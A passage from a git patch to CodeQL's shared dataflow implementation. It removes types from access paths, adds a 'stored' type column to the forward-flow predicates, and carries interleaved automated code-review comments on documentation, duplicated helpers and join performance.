@@ -4372,8 +4349,8 @@ module MakeImpl Lang> { Typ getTyp(DataFlowType t) { result = t } - bindingset[c, t, tail] - Ap apCons(Content c, Typ t, Ap tail) { result.isCons(c, t, tail) } + bindingset[c, tail] + Ap apCons(Content c, Ap tail) { result.isCons(c, tail) } class ApHeadContent = Content; @@ -4431,18 +4408,18 @@ module MakeImpl Lang> { module Stage6 = MkStage::Stage; /** - * A list of `Content`s where nested tails are also paired with a - * `DataFlowType`. If data flows from a source to a given node with a given - * `AccessPath`, this indicates the sequence of dereference operations needed - * to get from the value in the node to the tracked object. The - * `DataFlowType`s indicate the types of the stored values. + * A list of `Content`s. + * + * If data flows from a source to a given node with a given `AccessPath`, + * this indicates the sequence of dereference operations needed to get from + * the value in the node to the tracked object. */ private class AccessPath extends TAccessPath { /** Gets the head of this access path, if any. */ abstract Content getHead(); - /** Holds if this is a representation of `head` followed by the `typ,tail` pair. */ - abstract predicate isCons(Content head, DataFlowType typ, AccessPath tail); + /** Holds if this is a representation of `head` followed by `tail`. */ + abstract predicate isCons(Content head, AccessPath tail); /** Gets the front of this access path. */ abstract AccessPathFront getFront(); @@ -4460,7 +4437,7 @@ module MakeImpl Lang> { private class AccessPathNil extends AccessPath, TAccessPathNil { override Content getHead() { none() } - override predicate isCons(Content head, DataFlowType typ, AccessPath tail) { none() } + override predicate isCons(Content head, AccessPath tail) { none() } override AccessPathFrontNil getFront() { result = TFrontNil() } 
@@ -4473,39 +4450,34 @@ module MakeImpl Lang> { private class AccessPathCons extends AccessPath, TAccessPathCons { private Content head_; - private DataFlowType t; private AccessPath tail_; - AccessPathCons() { this = TAccessPathCons(head_, t, tail_) } + AccessPathCons() { this = TAccessPathCons(head_, tail_) } override Content getHead() { result = head_ } - override predicate isCons(Content head, DataFlowType typ, AccessPath tail) { - head = head_ and typ = t and tail = tail_ - } + override predicate isCons(Content head, AccessPath tail) { head = head_ and tail = tail_ } override AccessPathFrontHead getFront() { result = TFrontHead(head_) } override AccessPathApproxCons getApprox() { - result = TConsNil(head_, t) and tail_ = TAccessPathNil() + result = TConsNil(head_) and tail_ = TAccessPathNil() or - result = TConsCons(head_, t, tail_.getHead(), this.length()) + result = TConsCons(head_, tail_.getHead(), this.length()) or result = TCons1(head_, this.length()) } override int length() { result = 1 + tail_.length() } - private string ppTyp() { result = t.toString() and result != "" } - private string toStringImpl(boolean needsSuffix) { tail_ = TAccessPathNil() and needsSuffix = false and - result = head_.toString() + "]" + concat(" : " + this.ppTyp()) + result = head_.toString() + "]" or result = head_ + ", " + tail_.(AccessPathCons).toStringImpl(needsSuffix) or - exists(Content c2, Content c3, int len | tail_ = TAccessPathCons2(c2, _, c3, len) | + exists(Content c2, Content c3, int len | tail_ = TAccessPathCons2(c2, c3, len) | result = head_ + ", " + c2 + ", " + c3 + ", ... (" and len > 2 and needsSuffix = true or result = head_ + ", " + c2 + ", " + c3 + "]" and len = 2 and needsSuffix = false 
@@ -4527,18 +4499,16 @@ module MakeImpl Lang> { private class AccessPathCons2 extends AccessPath, TAccessPathCons2 { private Content head1; - private DataFlowType t; private Content head2; private int len; - AccessPathCons2() { this = TAccessPathCons2(head1, t, head2, len) } + AccessPathCons2() { this = TAccessPathCons2(head1, head2, len) } override Content getHead() { result = head1 } - override predicate isCons(Content head, DataFlowType typ, AccessPath tail) { + override predicate isCons(Content head, AccessPath tail) { head = head1 and - typ = t and - Stage5::consCand(head1, t, tail.getApprox()) and + Stage5::consCand(head1, tail.getApprox()) and tail.getHead() = head2 and tail.length() = len - 1 } @@ -4546,7 +4516,7 @@ module MakeImpl Lang> { override AccessPathFrontHead getFront() { result = TFrontHead(head1) } override AccessPathApproxCons getApprox() { - result = TConsCons(head1, t, head2, len) or + result = TConsCons(head1, head2, len) or result = TCons1(head1, len) } @@ -4569,9 +4539,9 @@ module MakeImpl Lang> { override Content getHead() { result = head_ } - override predicate isCons(Content head, DataFlowType typ, AccessPath tail) { + override predicate isCons(Content head, AccessPath tail) { head = head_ and - Stage5::consCand(head_, typ, tail.getApprox()) and + Stage5::consCand(head_, tail.getApprox()) and tail.length() = len - 1 } From 4933e803cf14b43768063b577609c146859c7805 Mon Sep 17 00:00:00 2001 From: Anders Schack-Mulligen Date: Mon, 2 Dec 2024 14:14:30 +0100 Subject: [PATCH 0774/1267] Dataflow: Track stored type. --- .../codeql/dataflow/internal/DataFlowImpl.qll | 374 ++++++++++-------- .../dataflow/internal/DataFlowImplCommon.qll | 2 + 2 files changed, 219 insertions(+), 157 deletions(-) diff --git a/shared/dataflow/codeql/dataflow/internal/DataFlowImpl.qll b/shared/dataflow/codeql/dataflow/internal/DataFlowImpl.qll index 084d9976f9f..1076957db5e 100644 --- a/shared/dataflow/codeql/dataflow/internal/DataFlowImpl.qll 
+++ b/shared/dataflow/codeql/dataflow/internal/DataFlowImpl.qll @@ -1419,6 +1419,10 @@ module MakeImpl Lang> { module Stage implements StageSig { import Param + private module TypOption = Option; + + private class TypOption = TypOption::Option; + /* Begin: Stage logic. */ pragma[nomagic] private Typ getNodeTyp(NodeEx node) { @@ -1472,16 +1476,17 @@ module MakeImpl Lang> { */ pragma[nomagic] additional predicate fwdFlow( - NodeEx node, FlowState state, Cc cc, SummaryCtx summaryCtx, Typ t, Ap ap, ApApprox apa + NodeEx node, FlowState state, Cc cc, SummaryCtx summaryCtx, Typ t, Ap ap, ApApprox apa, + TypOption stored ) { - fwdFlow1(node, state, cc, summaryCtx, _, t, ap, apa) + fwdFlow1(node, state, cc, summaryCtx, _, t, ap, apa, stored) } private predicate fwdFlow1( NodeEx node, FlowState state, Cc cc, SummaryCtx summaryCtx, Typ t0, Typ t, Ap ap, - ApApprox apa + ApApprox apa, TypOption stored ) { - fwdFlow0(node, state, cc, summaryCtx, t0, ap, apa) and + fwdFlow0(node, state, cc, summaryCtx, t0, ap, apa, stored) and PrevStage::revFlow(node, state, apa) and filter(node, state, t0, ap, t) and ( @@ -1496,17 +1501,19 @@ module MakeImpl Lang> { pragma[nomagic] private predicate fwdFlow0( - NodeEx node, FlowState state, Cc cc, SummaryCtx summaryCtx, Typ t, Ap ap, ApApprox apa + NodeEx node, FlowState state, Cc cc, SummaryCtx summaryCtx, Typ t, Ap ap, ApApprox apa, + TypOption stored ) { sourceNode(node, state) and (if hasSourceCallCtx() then cc = ccSomeCall() else cc = ccNone()) and summaryCtx = TSummaryCtxNone() and t = getNodeTyp(node) and ap instanceof ApNil and - apa = getApprox(ap) + apa = getApprox(ap) and + stored.isNone() or exists(NodeEx mid, FlowState state0, Typ t0, LocalCc localCc | - fwdFlow(mid, state0, cc, summaryCtx, t0, ap, apa) and + fwdFlow(mid, state0, cc, summaryCtx, t0, ap, apa, stored) and localCc = getLocalCc(cc) | localStep(mid, state0, node, state, true, _, localCc, _) and 
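Review bot: The new `stored` column on `fwdFlow`, `fwdFlow1` and `fwdFlow0` is added without any description; the QLDoc of `fwdFlow` starts above the `@@ -1472,16 +1476,17 @@` hunk and is not extended by it. The only hint in these hunks is `stored.isNone()` in the source case. From the store and read rules later in the patch, `stored` looks like the type of the innermost tracked value, absent exactly when `ap` is empty. If that is the intended invariant, add it to the QLDoc, e.g. `* The stored type is the type of the value at the end of ap; it is none if and only if ap is empty.` The line `if ap1 instanceof ApNil then stored2.asSome() = t1 else stored2 = stored1` in `fwdFlowStore` (hunk `@@ -1624,18 +1642,19 @@`) deserves the same one-line explanation.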
@@ -1516,23 +1523,23 @@ module MakeImpl Lang> { ap instanceof ApNil ) or - fwdFlowJump(node, state, t, ap, apa) and + fwdFlowJump(node, state, t, ap, apa, stored) and cc = ccNone() and summaryCtx = TSummaryCtxNone() or // store exists(Content c, Ap ap0 | - fwdFlowStore(_, _, ap0, c, t, node, state, cc, summaryCtx) and + fwdFlowStore(_, _, ap0, _, c, t, stored, node, state, cc, summaryCtx) and ap = apCons(c, ap0) and apa = getApprox(ap) ) or // read - fwdFlowRead(_, _, _, _, node, t, ap, state, cc, summaryCtx) and + fwdFlowRead(_, _, _, _, _, node, t, ap, stored, state, cc, summaryCtx) and apa = getApprox(ap) or // flow into a callable without summary context - fwdFlowInNoFlowThrough(node, apa, state, cc, t, ap) and + fwdFlowInNoFlowThrough(node, apa, state, cc, t, ap, stored) and summaryCtx = TSummaryCtxNone() and // When the call contexts of source and sink needs to match then there's // never any reason to enter a callable except to find a summary. See also 
@@ -1540,18 +1547,18 @@ module MakeImpl Lang> { not Config::getAFeature() instanceof FeatureEqualSourceSinkCallContext or // flow into a callable with summary context (non-linear recursion) - fwdFlowInFlowThrough(node, apa, state, cc, t, ap) and - summaryCtx = TSummaryCtxSome(node, state, t, ap) + fwdFlowInFlowThrough(node, apa, state, cc, t, ap, stored) and + summaryCtx = TSummaryCtxSome(node, state, t, ap, stored) or // flow out of a callable - fwdFlowOut(_, _, node, state, cc, summaryCtx, t, ap, apa) + fwdFlowOut(_, _, node, state, cc, summaryCtx, t, ap, apa, stored) or // flow through a callable exists( DataFlowCall call, CcCall ccc, RetNodeEx ret, boolean allowsFieldFlow, ApApprox innerArgApa | - fwdFlowThrough(call, cc, state, ccc, summaryCtx, t, ap, apa, ret, innerArgApa) and + fwdFlowThrough(call, cc, state, ccc, summaryCtx, t, ap, apa, stored, ret, innerArgApa) and flowThroughOutOfCall(call, ccc, ret, node, allowsFieldFlow, innerArgApa, apa) and not inBarrier(node, state) and if allowsFieldFlow = false then ap instanceof ApNil else any() @@ -1560,8 +1567,8 @@ module MakeImpl Lang> { private newtype TSummaryCtx = TSummaryCtxNone() or - TSummaryCtxSome(ParamNodeEx p, FlowState state, Typ t, Ap ap) { - fwdFlowInFlowThrough(p, _, state, _, t, ap) + TSummaryCtxSome(ParamNodeEx p, FlowState state, Typ t, Ap ap, TypOption stored) { + fwdFlowInFlowThrough(p, _, state, _, t, ap, stored) } /** 
@@ -1589,33 +1596,44 @@ module MakeImpl Lang> { private FlowState state; private Typ t; private Ap ap; + private TypOption stored; - SummaryCtxSome() { this = TSummaryCtxSome(p, state, t, ap) } + SummaryCtxSome() { this = TSummaryCtxSome(p, state, t, ap, stored) } ParamNodeEx getParamNode() { result = p } private string ppTyp() { result = t.toString() and result != "" } - override string toString() { result = p + concat(" : " + this.ppTyp()) + " " + ap } + private string ppStored() { + exists(string ppt | ppt = stored.toString() | + if stored.isNone() or ppt = "" then result = "" else result = " : " + ppt + ) + } + + override string toString() { + result = p + concat(" : " + this.ppTyp()) + " " + ap + this.ppStored() + } override Location getLocation() { result = p.getLocation() } } - private predicate fwdFlowJump(NodeEx node, FlowState state, Typ t, Ap ap, ApApprox apa) { + private predicate fwdFlowJump( + NodeEx node, FlowState state, Typ t, Ap ap, ApApprox apa, TypOption stored + ) { exists(NodeEx mid | - fwdFlow(mid, state, _, _, t, ap, apa) and + fwdFlow(mid, state, _, _, t, ap, apa, stored) and jumpStepEx(mid, node) ) or exists(NodeEx mid | - fwdFlow(mid, state, _, _, _, ap, apa) and + fwdFlow(mid, state, _, _, _, ap, apa, stored) and additionalJumpStep(mid, node, _) and t = getNodeTyp(node) and ap instanceof ApNil ) or exists(NodeEx mid, FlowState state0 | - fwdFlow(mid, state0, _, _, _, ap, apa) and + fwdFlow(mid, state0, _, _, _, ap, apa, stored) and additionalJumpStateStep(mid, state0, node, state, _) and t = getNodeTyp(node) and ap instanceof ApNil 
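Review bot: `ppStored()` is added here in `SummaryCtxSome` and again, with an identical body, in `PathNodeMid` in the `@@ -3006,6 +3050,12 @@` hunk; a single shared helper would keep the two renderings from drifting apart. It is also written in a different idiom from the adjacent `ppTyp()`, which drops the empty case through `concat(" : " + this.ppTyp())`, whereas `ppStored()` uses an explicit `if stored.isNone() or ppt = ""`. One module-level predicate such as `private string ppStored(TypOption stored)` placed next to the `TypOption` alias would serve both `toString` implementations. The body of `SummaryCtxSome` begins above this hunk, so its header is not visible here.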
@@ -1624,18 +1642,19 @@ module MakeImpl Lang> { pragma[nomagic] private predicate fwdFlowStore( - NodeEx node1, Typ t1, Ap ap1, Content c, Typ t2, NodeEx node2, FlowState state, Cc cc, - SummaryCtx summaryCtx + NodeEx node1, Typ t1, Ap ap1, TypOption stored1, Content c, Typ t2, TypOption stored2, + NodeEx node2, FlowState state, Cc cc, SummaryCtx summaryCtx ) { exists(DataFlowType contentType, DataFlowType containerType, ApApprox apa1 | - fwdFlow(node1, state, cc, summaryCtx, t1, ap1, apa1) and + fwdFlow(node1, state, cc, summaryCtx, t1, ap1, apa1, stored1) and not outBarrier(node1, state) and not inBarrier(node2, state) and PrevStage::storeStepCand(node1, apa1, c, node2, contentType, containerType) and t2 = getTyp(containerType) and // We need to typecheck stores here, since reverse flow through a getter // might have a different type here compared to inside the getter. - typecheck(t1, getTyp(contentType)) + typecheck(t1, getTyp(contentType)) and + if ap1 instanceof ApNil then stored2.asSome() = t1 else stored2 = stored1 ) } @@ -1646,7 +1665,7 @@ module MakeImpl Lang> { */ pragma[nomagic] private predicate fwdFlowConsCand(Typ t2, Ap cons, Content c, Typ t1, Ap tail) { - fwdFlowStore(_, t1, tail, c, t2, _, _, _, _) and + fwdFlowStore(_, t1, tail, _, c, t2, _, _, _, _, _) and cons = apCons(c, tail) } @@ -1664,11 +1683,11 @@ module MakeImpl Lang> { pragma[nomagic] private predicate fwdFlowRead0( - Typ t, Ap ap, Content c, NodeEx node1, NodeEx node2, FlowState state, Cc cc, - SummaryCtx summaryCtx + Typ t, Ap ap, TypOption stored, Content c, NodeEx node1, NodeEx node2, FlowState state, + Cc cc, SummaryCtx summaryCtx ) { exists(ApHeadContent apc | - fwdFlow(node1, state, cc, summaryCtx, t, ap, _) and + fwdFlow(node1, state, cc, summaryCtx, t, ap, _, stored) and not outBarrier(node1, state) and not inBarrier(node2, state) and apc = getHeadContent(ap) and 
@@ -1678,19 +1697,28 @@ module MakeImpl Lang> { pragma[nomagic] private predicate fwdFlowRead( - NodeEx node1, Typ t1, Ap ap1, Content c, NodeEx node2, Typ t2, Ap ap2, FlowState state, - Cc cc, SummaryCtx summaryCtx + NodeEx node1, Typ t1, Ap ap1, TypOption stored1, Content c, NodeEx node2, Typ t2, Ap ap2, + TypOption stored2, FlowState state, Cc cc, SummaryCtx summaryCtx ) { - fwdFlowRead0(t1, ap1, c, node1, node2, state, cc, summaryCtx) and - fwdFlowConsCand(t1, ap1, c, t2, ap2) + exists(Typ ct1, Typ ct2 | + fwdFlowRead0(t1, ap1, stored1, c, node1, node2, state, cc, summaryCtx) and + fwdFlowConsCand(ct1, ap1, c, ct2, ap2) and + typecheck(t1, ct1) and + typecheck(t2, ct2) and + if ap2 instanceof ApNil + then stored2.isNone() and stored1.asSome() = t2 + else ( + stored2 = stored1 and t2 = getNodeTyp(node2) + ) + ) } pragma[nomagic] private predicate fwdFlowIntoArg( ArgNodeEx arg, FlowState state, Cc outercc, SummaryCtx summaryCtx, Typ t, Ap ap, - boolean emptyAp, ApApprox apa, boolean cc + boolean emptyAp, ApApprox apa, TypOption stored, boolean cc ) { - fwdFlow(arg, state, outercc, summaryCtx, t, ap, apa) and + fwdFlow(arg, state, outercc, summaryCtx, t, ap, apa, stored) and (if instanceofCcCall(outercc) then cc = true else cc = false) and if ap instanceof ApNil then emptyAp = true else emptyAp = false } @@ -1797,9 +1825,9 @@ module MakeImpl Lang> { private predicate fwdFlowInCand( DataFlowCall call, ArgNodeEx arg, FlowState state, Cc outercc, DataFlowCallable inner, ParamNodeEx p, SummaryCtx summaryCtx, Typ t, Ap ap, boolean emptyAp, ApApprox apa, - boolean cc + TypOption stored, boolean cc ) { - fwdFlowIntoArg(arg, state, outercc, summaryCtx, t, ap, emptyAp, apa, cc) and + fwdFlowIntoArg(arg, state, outercc, summaryCtx, t, ap, emptyAp, apa, stored, cc) and ( inner = viableImplCallContextReducedInlineLate(call, arg, outercc) or 
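Review bot: In `fwdFlowRead` the new `if ap2 instanceof ApNil` block makes two non-obvious choices with no comment: the empty-tail branch takes the result type from `stored1.asSome() = t2`, and the non-empty branch resets `t2` to `getNodeTyp(node2)` while `ct2` from `fwdFlowConsCand` is used only as a `typecheck` filter. The first branch produces no tuple when `stored1` is `none`, so a read with a non-empty `ap1` and no stored type would drop the path silently, which in a taint query shows up as a missed result rather than an error. The store rule appears to exclude that case, but it should be stated, e.g. `// ap2 empty: the value read is the one originally stored, so restore its type; otherwise keep stored and use the node type.` Separately, `ct1` and `ct2` are now existential instead of being bound to `t1` and `t2`, which may widen the join with `fwdFlowConsCand`; tuple counts for this predicate would confirm whether that matters.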
@@ -1813,10 +1841,11 @@ module MakeImpl Lang> { pragma[inline] private predicate fwdFlowInCandTypeFlowDisabled( DataFlowCall call, ArgNodeEx arg, FlowState state, Cc outercc, DataFlowCallable inner, - ParamNodeEx p, SummaryCtx summaryCtx, Typ t, Ap ap, ApApprox apa, boolean cc + ParamNodeEx p, SummaryCtx summaryCtx, Typ t, Ap ap, ApApprox apa, TypOption stored, + boolean cc ) { not enableTypeFlow() and - fwdFlowInCand(call, arg, state, outercc, inner, p, summaryCtx, t, ap, _, apa, cc) + fwdFlowInCand(call, arg, state, outercc, inner, p, summaryCtx, t, ap, _, apa, stored, cc) } pragma[nomagic] @@ -1825,7 +1854,7 @@ module MakeImpl Lang> { boolean emptyAp, ApApprox apa, boolean cc ) { enableTypeFlow() and - fwdFlowInCand(call, arg, _, outercc, inner, p, _, _, _, emptyAp, apa, cc) + fwdFlowInCand(call, arg, _, outercc, inner, p, _, _, _, emptyAp, apa, _, cc) } pragma[nomagic] @@ -1851,16 +1880,16 @@ module MakeImpl Lang> { predicate fwdFlowIn( DataFlowCall call, ArgNodeEx arg, DataFlowCallable inner, ParamNodeEx p, FlowState state, Cc outercc, CcCall innercc, SummaryCtx summaryCtx, Typ t, Ap ap, - ApApprox apa, boolean cc + ApApprox apa, TypOption stored, boolean cc ) { // type flow disabled: linear recursion fwdFlowInCandTypeFlowDisabled(call, arg, state, outercc, inner, p, summaryCtx, t, ap, - apa, cc) and + apa, stored, cc) and fwdFlowInValidEdgeTypeFlowDisabled(call, inner, innercc, pragma[only_bind_into](cc)) or // type flow enabled: non-linear recursion exists(boolean emptyAp | - fwdFlowIntoArg(arg, state, outercc, summaryCtx, t, ap, emptyAp, apa, cc) and + fwdFlowIntoArg(arg, state, outercc, summaryCtx, t, ap, emptyAp, apa, stored, cc) and fwdFlowInValidEdgeTypeFlowEnabled(call, arg, outercc, inner, p, innercc, emptyAp, apa, cc) ) 
@@ -1873,9 +1902,10 @@ module MakeImpl Lang> { pragma[nomagic] private predicate fwdFlowInNoFlowThrough( - ParamNodeEx p, ApApprox apa, FlowState state, CcCall innercc, Typ t, Ap ap + ParamNodeEx p, ApApprox apa, FlowState state, CcCall innercc, Typ t, Ap ap, + TypOption stored ) { - FwdFlowInNoThrough::fwdFlowIn(_, _, _, p, state, _, innercc, _, t, ap, apa, _) + FwdFlowInNoThrough::fwdFlowIn(_, _, _, p, state, _, innercc, _, t, ap, apa, stored, _) } private predicate top() { any() } @@ -1884,9 +1914,10 @@ module MakeImpl Lang> { pragma[nomagic] private predicate fwdFlowInFlowThrough( - ParamNodeEx p, ApApprox apa, FlowState state, CcCall innercc, Typ t, Ap ap + ParamNodeEx p, ApApprox apa, FlowState state, CcCall innercc, Typ t, Ap ap, + TypOption stored ) { - FwdFlowInThrough::fwdFlowIn(_, _, _, p, state, _, innercc, _, t, ap, apa, _) + FwdFlowInThrough::fwdFlowIn(_, _, _, p, state, _, innercc, _, t, ap, apa, stored, _) } pragma[nomagic] @@ -1928,11 +1959,11 @@ module MakeImpl Lang> { pragma[nomagic] private predicate fwdFlowIntoRet( RetNodeEx ret, FlowState state, CcNoCall cc, SummaryCtx summaryCtx, Typ t, Ap ap, - ApApprox apa + ApApprox apa, TypOption stored ) { instanceofCcNoCall(cc) and not outBarrier(ret, state) and - fwdFlow(ret, state, cc, summaryCtx, t, ap, apa) + fwdFlow(ret, state, cc, summaryCtx, t, ap, apa, stored) } pragma[nomagic] @@ -1940,7 +1971,7 @@ module MakeImpl Lang> { DataFlowCall call, RetNodeEx ret, CcNoCall innercc, DataFlowCallable inner, NodeEx out, ApApprox apa, boolean allowsFieldFlow ) { - fwdFlowIntoRet(ret, _, innercc, _, _, _, apa) and + fwdFlowIntoRet(ret, _, innercc, _, _, _, apa, _) and inner = ret.getEnclosingCallable() and ( call = viableImplCallContextReducedReverseInlineLate(inner, innercc) and 
@@ -1964,10 +1995,10 @@ module MakeImpl Lang> { pragma[inline] private predicate fwdFlowOut( DataFlowCall call, DataFlowCallable inner, NodeEx out, FlowState state, CcNoCall outercc, - SummaryCtx summaryCtx, Typ t, Ap ap, ApApprox apa + SummaryCtx summaryCtx, Typ t, Ap ap, ApApprox apa, TypOption stored ) { exists(RetNodeEx ret, CcNoCall innercc, boolean allowsFieldFlow | - fwdFlowIntoRet(ret, state, innercc, summaryCtx, t, ap, apa) and + fwdFlowIntoRet(ret, state, innercc, summaryCtx, t, ap, apa, stored) and fwdFlowOutValidEdge(call, ret, innercc, inner, out, outercc, apa, allowsFieldFlow) and not inBarrier(out, state) and if allowsFieldFlow = false then ap instanceof ApNil else any() 
@@ -1984,47 +2015,52 @@ module MakeImpl Lang> { pragma[nomagic] private predicate dataFlowTakenCallEdgeIn0( DataFlowCall call, DataFlowCallable c, ParamNodeEx p, FlowState state, CcCall innercc, - Typ t, Ap ap, boolean cc + Typ t, Ap ap, TypOption stored, boolean cc ) { - FwdFlowInNoThrough::fwdFlowIn(call, _, c, p, state, _, innercc, _, t, ap, _, cc) + FwdFlowInNoThrough::fwdFlowIn(call, _, c, p, state, _, innercc, _, t, ap, _, stored, cc) or - FwdFlowInThrough::fwdFlowIn(call, _, c, p, state, _, innercc, _, t, ap, _, cc) + FwdFlowInThrough::fwdFlowIn(call, _, c, p, state, _, innercc, _, t, ap, _, stored, cc) } pragma[nomagic] - private predicate fwdFlow1Param(ParamNodeEx p, FlowState state, CcCall cc, Typ t0, Ap ap) { + private predicate fwdFlow1Param( + ParamNodeEx p, FlowState state, CcCall cc, Typ t0, Ap ap, TypOption stored + ) { instanceofCcCall(cc) and - fwdFlow1(p, state, cc, _, t0, _, ap, _) + fwdFlow1(p, state, cc, _, t0, _, ap, _, stored) } pragma[nomagic] predicate dataFlowTakenCallEdgeIn(DataFlowCall call, DataFlowCallable c, boolean cc) { - exists(ParamNodeEx p, FlowState state, CcCall innercc, Typ t, Ap ap | - dataFlowTakenCallEdgeIn0(call, c, p, state, innercc, t, ap, cc) and - fwdFlow1Param(p, state, innercc, t, ap) + exists(ParamNodeEx p, FlowState state, CcCall innercc, Typ t, Ap ap, TypOption stored | + dataFlowTakenCallEdgeIn0(call, c, p, state, innercc, t, ap, stored, cc) and + fwdFlow1Param(p, state, innercc, t, ap, stored) ) } pragma[nomagic] private predicate dataFlowTakenCallEdgeOut0( - DataFlowCall call, DataFlowCallable c, NodeEx node, FlowState state, Cc cc, Typ t, Ap ap + DataFlowCall call, DataFlowCallable c, NodeEx node, FlowState state, Cc cc, Typ t, + Ap ap, TypOption stored ) { - fwdFlowOut(call, c, node, state, cc, _, t, ap, _) + fwdFlowOut(call, c, node, state, cc, _, t, ap, _, stored) } pragma[nomagic] - private predicate fwdFlow1Out(NodeEx node, FlowState state, Cc cc, Typ t0, Ap ap) { + private predicate fwdFlow1Out( + 
NodeEx node, FlowState state, Cc cc, Typ t0, Ap ap, TypOption stored + ) { exists(ApApprox apa | - fwdFlow1(node, state, cc, _, t0, _, ap, apa) and + fwdFlow1(node, state, cc, _, t0, _, ap, apa, stored) and PrevStage::callEdgeReturn(_, _, _, _, node, _, apa) ) } pragma[nomagic] predicate dataFlowTakenCallEdgeOut(DataFlowCall call, DataFlowCallable c) { - exists(NodeEx node, FlowState state, Cc cc, Typ t, Ap ap | - dataFlowTakenCallEdgeOut0(call, c, node, state, cc, t, ap) and - fwdFlow1Out(node, state, cc, t, ap) + exists(NodeEx node, FlowState state, Cc cc, Typ t, Ap ap, TypOption stored | + dataFlowTakenCallEdgeOut0(call, c, node, state, cc, t, ap, stored) and + fwdFlow1Out(node, state, cc, t, ap, stored) ) } @@ -2038,7 +2074,7 @@ module MakeImpl Lang> { or exists(NodeEx node | cc = false and - fwdFlowJump(node, _, _, _, _) and + fwdFlowJump(node, _, _, _, _, _) and c = node.getEnclosingCallable() ) } @@ -2057,14 +2093,14 @@ module MakeImpl Lang> { pragma[nomagic] private predicate fwdFlowRetFromArg( RetNodeEx ret, FlowState state, CcCall ccc, SummaryCtxSome summaryCtx, ApApprox argApa, - Typ t, Ap ap, ApApprox apa + Typ t, Ap ap, ApApprox apa, TypOption stored ) { exists(ReturnKindExt kind, ParamNodeEx p, Ap argAp | instanceofCcCall(ccc) and fwdFlow(pragma[only_bind_into](ret), state, ccc, summaryCtx, t, ap, - pragma[only_bind_into](apa)) and + pragma[only_bind_into](apa), stored) and summaryCtx = - TSummaryCtxSome(pragma[only_bind_into](p), _, _, pragma[only_bind_into](argAp)) and + TSummaryCtxSome(pragma[only_bind_into](p), _, _, pragma[only_bind_into](argAp), _) and not outBarrier(ret, state) and kind = ret.getKind() and parameterFlowThroughAllowed(p, kind) and 
@@ -2076,27 +2112,29 @@ module MakeImpl Lang> { pragma[inline] private predicate fwdFlowThrough0( DataFlowCall call, ArgNodeEx arg, Cc cc, FlowState state, CcCall ccc, - SummaryCtx summaryCtx, Typ t, Ap ap, ApApprox apa, RetNodeEx ret, + SummaryCtx summaryCtx, Typ t, Ap ap, ApApprox apa, TypOption stored, RetNodeEx ret, SummaryCtxSome innerSummaryCtx, ApApprox innerArgApa ) { - fwdFlowRetFromArg(ret, state, ccc, innerSummaryCtx, innerArgApa, t, ap, apa) and + fwdFlowRetFromArg(ret, state, ccc, innerSummaryCtx, innerArgApa, t, ap, apa, stored) and fwdFlowIsEntered(call, arg, cc, ccc, summaryCtx, innerSummaryCtx) } pragma[nomagic] private predicate fwdFlowThrough( DataFlowCall call, Cc cc, FlowState state, CcCall ccc, SummaryCtx summaryCtx, Typ t, - Ap ap, ApApprox apa, RetNodeEx ret, ApApprox innerArgApa + Ap ap, ApApprox apa, TypOption stored, RetNodeEx ret, ApApprox innerArgApa ) { - fwdFlowThrough0(call, _, cc, state, ccc, summaryCtx, t, ap, apa, ret, _, innerArgApa) + fwdFlowThrough0(call, _, cc, state, ccc, summaryCtx, t, ap, apa, stored, ret, _, + innerArgApa) } pragma[nomagic] private predicate fwdFlowIsEntered0( DataFlowCall call, ArgNodeEx arg, Cc cc, CcCall innerCc, SummaryCtx summaryCtx, - ParamNodeEx p, FlowState state, Typ t, Ap ap + ParamNodeEx p, FlowState state, Typ t, Ap ap, TypOption stored ) { - FwdFlowInThrough::fwdFlowIn(call, arg, _, p, state, cc, innerCc, summaryCtx, t, ap, _, _) + FwdFlowInThrough::fwdFlowIn(call, arg, _, p, state, cc, innerCc, summaryCtx, t, ap, _, + stored, _) } /** 
@@ -2108,22 +2146,22 @@ module MakeImpl Lang> { DataFlowCall call, ArgNodeEx arg, Cc cc, CcCall innerCc, SummaryCtx summaryCtx, SummaryCtxSome innerSummaryCtx ) { - exists(ParamNodeEx p, FlowState state, Typ t, Ap ap | - fwdFlowIsEntered0(call, arg, cc, innerCc, summaryCtx, p, state, t, ap) and - innerSummaryCtx = TSummaryCtxSome(p, state, t, ap) + exists(ParamNodeEx p, FlowState state, Typ t, Ap ap, TypOption stored | + fwdFlowIsEntered0(call, arg, cc, innerCc, summaryCtx, p, state, t, ap, stored) and + innerSummaryCtx = TSummaryCtxSome(p, state, t, ap, stored) ) } pragma[nomagic] private predicate storeStepFwd(NodeEx node1, Ap ap1, Content c, NodeEx node2, Ap ap2) { - fwdFlowStore(node1, _, ap1, c, _, node2, _, _, _) and + fwdFlowStore(node1, _, ap1, _, c, _, _, node2, _, _, _) and ap2 = apCons(c, ap1) and readStepFwd(_, ap2, c, _, _) } pragma[nomagic] private predicate readStepFwd(NodeEx n1, Ap ap1, Content c, NodeEx n2, Ap ap2) { - fwdFlowRead(n1, _, ap1, c, n2, _, ap2, _, _, _) + fwdFlowRead(n1, _, ap1, _, c, n2, _, ap2, _, _, _, _) } pragma[nomagic] 
@@ -2131,17 +2169,18 @@ module MakeImpl Lang> { DataFlowCall call, FlowState state, CcCall ccc, Ap ap, ApApprox apa, RetNodeEx ret, SummaryCtxSome innerSummaryCtx, ApApprox innerArgApa ) { - fwdFlowThrough0(call, _, _, state, ccc, _, _, ap, apa, ret, innerSummaryCtx, innerArgApa) + fwdFlowThrough0(call, _, _, state, ccc, _, _, ap, apa, _, ret, innerSummaryCtx, + innerArgApa) } pragma[nomagic] private predicate returnFlowsThrough( RetNodeEx ret, ReturnPosition pos, FlowState state, CcCall ccc, ParamNodeEx p, Typ argT, - Ap argAp, ApApprox argApa, Ap ap + Ap argAp, ApApprox argApa, TypOption argStored, Ap ap ) { exists(DataFlowCall call, ApApprox apa, boolean allowsFieldFlow | - returnFlowsThrough0(call, state, ccc, ap, apa, ret, TSummaryCtxSome(p, _, argT, argAp), - argApa) and + returnFlowsThrough0(call, state, ccc, ap, apa, ret, + TSummaryCtxSome(p, _, argT, argAp, argStored), argApa) and flowThroughOutOfCall(call, ccc, ret, _, allowsFieldFlow, argApa, apa) and pos = ret.getReturnPosition() and if allowsFieldFlow = false then ap instanceof ApNil else any() @@ -2152,12 +2191,13 @@ module MakeImpl Lang> { private predicate flowThroughIntoCall( DataFlowCall call, ArgNodeEx arg, ParamNodeEx p, boolean allowsFieldFlow, Ap argAp, Ap ap ) { - exists(ApApprox argApa, Typ argT | + exists(ApApprox argApa, Typ argT, TypOption argStored | returnFlowsThrough(_, _, _, _, pragma[only_bind_into](p), pragma[only_bind_into](argT), - pragma[only_bind_into](argAp), 